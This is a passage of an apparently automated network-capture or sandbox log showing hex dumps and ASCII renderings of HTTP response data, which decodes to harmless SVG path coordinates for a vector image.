                                                                                                                                                                                                                                                        Data Ascii: .66a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M557.52,157.94a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC413INData Raw: 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 31 2e 34 39 2c 32 33 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61
                                                                                                                                                                                                                                                        Data Ascii: 9,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"/><path class="cls-7" d="M591.49,234a1.92,1.92,0,0,1-.87,2.49,2.78,2.78,0,0,1-3.71-1.05,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><pa
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC429INData Raw: 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 33 31 2c 39 34 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 30 35 2c 38 36 2e 36 34
                                                                                                                                                                                                                                                        Data Ascii: 1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.31,94.36a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.05,86.64
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC445INData Raw: 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2e 32 38 2c 31 37 30 2e 34 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2c 31 36 32 2e 37 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c
                                                                                                                                                                                                                                                        Data Ascii: 6,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644.28,170.46a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644,162.74a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC461INData Raw: 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2e 32 35 2c 32 34 36 2e 35 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2c 32 33 38 2e 38 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32
                                                                                                                                                                                                                                                        Data Ascii: "/><path class="cls-7" d="M678.25,246.56a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M678,238.84a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC477INData Raw: 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 39 36 2e 38 31 2c 39 39 2e 31 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e
                                                                                                                                                                                                                                                        Data Ascii: a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M696.81,99.15a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC493INData Raw: 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 33 30 2e 37 38 2c 31 37 35 2e 32 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                        Data Ascii: 1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M730.78,175.26a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1.05,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"/><path class="
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC525INData Raw: 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 37 35 2c 32 35 31 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 34 39 2c 32 34 33 2e 36 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39
                                                                                                                                                                                                                                                        Data Ascii: 22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.75,251.36a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.49,243.64a1.92,1.92,0,0,1-.87,2.49
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC541INData Raw: 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 35 33 2e 34 32 2c 32 35 39 2e 35 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                        Data Ascii: .13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M653.42,259.54a2.16,2.16,0,0,1-1.1,2.75,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC557INData Raw: 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 31 35 2c 33 32 30 2e 36 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20
                                                                                                                                                                                                                                                        Data Ascii: -4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M688.15,320.61a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9"
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC573INData Raw: 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 39 2c 33 38 31 2e 36 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2c 33 37 33 61 32 2e 31 36
                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M722.89,381.68a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M723,373a2.16
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC589INData Raw: 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 36 32 2c 34 34 32 2e 37 36 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 37 2c 34 33 34 2e 30 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c
                                                                                                                                                                                                                                                        Data Ascii: ,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M757.62,442.76a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M757.7,434.08a2.15,2.15,0,0,1-1.09,2.75,
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC605INData Raw: 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 38 2c 32 35 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c
                                                                                                                                                                                                                                                        Data Ascii: 2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M785.78,252a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC621INData Raw: 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 34 34 2c 33 32 31 2e 37 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 35 31 2c 33 31 33 2e 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37
                                                                                                                                                                                                                                                        Data Ascii: ath class="cls-9" d="M820.44,321.78a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M820.51,313.1a2.15,2.15,0,0,1-1.09,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.7
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC637INData Raw: 22 4d 38 35 35 2e 31 37 2c 33 38 32 2e 38 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 35 2e 32 35 2c 33 37 34 2e 31 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c
                                                                                                                                                                                                                                                        Data Ascii: "M855.17,382.86a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M855.25,374.18a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC653INData Raw: 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 39 30 2c 34 33 35 2e 32 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74
                                                                                                                                                                                                                                                        Data Ascii: .1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.2,2.64,2.64,0,0,1,0,3.57"/><path class="cls-9" d="M890,435.25a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.63,2.63,0,0,1,0,3.57"/><pat
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC669INData Raw: 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 38 2e 30 36 2c 32 35 33 2e 32 31 41 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2c 39 31 37 2c 32 35 36 61 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33
                                                                                                                                                                                                                                                        Data Ascii: 0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M918.06,253.21A2.15,2.15,0,0,1,917,256a3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC685INData Raw: 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 35 32 2e 38 2c 33 31 34 2e 32 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39
